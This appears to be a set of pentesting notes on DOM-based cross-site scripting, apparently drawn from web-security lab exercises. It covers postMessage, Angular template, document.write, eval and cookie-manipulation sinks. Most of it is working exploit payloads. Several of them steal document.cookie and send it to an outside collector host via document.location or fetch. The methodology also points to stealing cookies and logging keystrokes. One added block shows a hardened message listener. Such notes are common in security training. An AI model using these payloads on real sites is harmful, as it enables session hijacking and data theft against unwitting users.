# DOM-based

* **Identify potential sources of user input**:
  * Look for URL parameters, form inputs, or fragments (`#fragment`) that the page processes dynamically using JavaScript.
  * Use browser developer tools to inspect how JavaScript interacts with the DOM. Look for dangerous methods like `innerHTML`, `document.write()`, `eval()`, or similar.
* **Test for input reflection**:
  * Modify input that is passed through URL parameters or fragments to see if it appears on the page without proper encoding or sanitization. For example:
    * `https://example.com/page.html?param=<script>alert('XSS')</script>`
    * `https://example.com/page.html#<script>alert('XSS')</script>`
* **Probe with harmless scripts**:
  * Start by injecting simple, non-malicious scripts like `<img src=x onerror=alert(1)>` to check whether the browser executes your code. If the alert box appears, it’s a sign the input is not properly sanitized.
* **Explore execution context**:
  * Investigate where your input is reflected in the DOM. Sometimes the payload might be reflected in HTML, but within a `script` block or as part of an event handler, like `onmouseover`, making the context important.
* **Craft final exploit**:
  * If the injection point allows it, create a malicious payload that achieves your goal, such as stealing cookies, redirecting the user, or logging keystrokes.
  * Deliver the payload via a URL or other input method to trigger the exploit.

**Common attack vectors**:

* URL parameters or fragment identifiers (`#fragment`).
* Insecure client-side JavaScript that processes user-controlled data directly.

Post message listener:

```html
<iframe src="https://target.net/" onload="this.contentWindow.postMessage('javascript:document.location=`https://collaborator.com?c=`+document.cookie','*')">

<iframe src="https://0adb00b304aa512b809fe4f1006100fe.web-security-academy.net/" onload="this.contentWindow.postMessage('javascript:print()//http:','*')">
```

Post message innerHTML:

```html
<iframe src="https://target.net/" onload="this.contentWindow.postMessage('<img src=1 onerror=fetch(`https://OASTIFY.COM?collector=`+btoa(document.cookie))>','*')">

<iframe src="https://target.net" onload="this.contentWindow.postMessage('<img src=1 onerror=print()>','*')">
```

Post message JSON:

```html
<iframe src=https://TARGET.net/ onload='this.contentWindow.postMessage(JSON.stringify({
    "type": "load-channel",
    "url": "javascript:document.location='https://OASTIFY.COM?c='+document.cookie"
}), "*");'>
```
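The three `postMessage` payloads above work because the receiving listener never checks `event.origin` and passes `e.data` straight into `location` or `innerHTML`. As an added example (not from these notes), this is the hardened form of such a listener, written as pure functions so the policy can be checked outside a browser; the `https://app.example.com` allow-list and the `load-channel` message shape are assumptions.

```javascript
// Added defensive example: a message handler that rejects the javascript:
// URL and innerHTML payloads shown above. Allow-list is assumed.
const ALLOWED_ORIGINS = new Set(['https://app.example.com']);

// Return a decision instead of acting, so the logic is testable under Node;
// the browser wiring at the bottom applies it.
function decideMessage(event, allowedOrigins = ALLOWED_ORIGINS) {
  // 1. Origin check: a message sent with postMessage(..., '*') from a hostile
  //    page arrives tagged with that page's origin, which is not allow-listed.
  if (!allowedOrigins.has(event.origin)) {
    return { action: 'reject', reason: 'untrusted origin' };
  }
  // 2. Structural check: require a JSON object with a known "type"; never
  //    feed a raw string into location or innerHTML.
  let msg;
  try {
    msg = typeof event.data === 'string' ? JSON.parse(event.data) : event.data;
  } catch {
    return { action: 'reject', reason: 'not JSON' };
  }
  if (!msg || typeof msg !== 'object' || msg.type !== 'load-channel') {
    return { action: 'reject', reason: 'unknown message type' };
  }
  // 3. Scheme check: resolve relative to the page and allow only http(s),
  //    which blocks "javascript:document.location=..." style URLs.
  let url;
  try {
    url = new URL(String(msg.url), 'https://app.example.com/');
  } catch {
    return { action: 'reject', reason: 'unparseable url' };
  }
  if (url.protocol !== 'https:' && url.protocol !== 'http:') {
    return { action: 'reject', reason: `blocked scheme ${url.protocol}` };
  }
  return { action: 'navigate', url: url.href };
}

// Browser-only wiring (skipped under Node). Any user-visible text derived from
// the message would go through textContent, never innerHTML.
if (typeof window !== 'undefined') {
  window.addEventListener('message', (event) => {
    const d = decideMessage(event);
    if (d.action === 'navigate') window.location.assign(d.url);
    else console.warn('Ignored message:', d.reason);
  });
}
```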

Angular ng-app:

Using functions inside the Angular scope; remember the `()` at the end, which invokes the newly constructed function.

```javascript
// Check which functions are available inside the Angular scope
angular.element(document.getElementById('id-inside-ng-app')).scope();

// Template expressions that build a function from a string via .constructor and call it
{{$on.constructor('document.location="https://OASTIFY.COM?c="+document.cookie')()}}

{{$eval.constructor('alert(1)')()}}
```

`document.write` sink, accepts a payload like:

```html
"></select><script>document.location='https://OASTIFY.COM/?domxss='+document.cookie</script>//
```

`eval` input (payload breaks out of a string inside the evaluated code):

```javascript
\"-fetch('https://OASTIFY.COM?reflects='+document.cookie)}//
```

### Cookie manipulation

The `lastViewedProduct` cookie is set from the last visited URL. The iframe first loads the payload URL (so the malicious URL is saved in the cookie) and then redirects to the home page, where the cookie value is reflected:

```html
<iframe src="https://target.web-security-academy.net/product?productId=1&'><script>print()</script>" onload="if(!window.x)this.src='https://target.web-security-academy.net';window.x=1;">


<iframe src="https://TARGET.net/product?productId=1&'><script>print()</script>" onload="if(!window.x)this.src='https://TARGET.net';window.x=1;">
```

When the `iframe` loads for the first time, the browser temporarily opens the malicious URL, which is then saved as the value of the `lastViewedProduct` cookie. The `onload` event handler ensures that the victim is then immediately redirected to the home page, unaware that this manipulation ever took place. While the victim's browser has the poisoned cookie saved, loading the home page will cause the payload to execute.

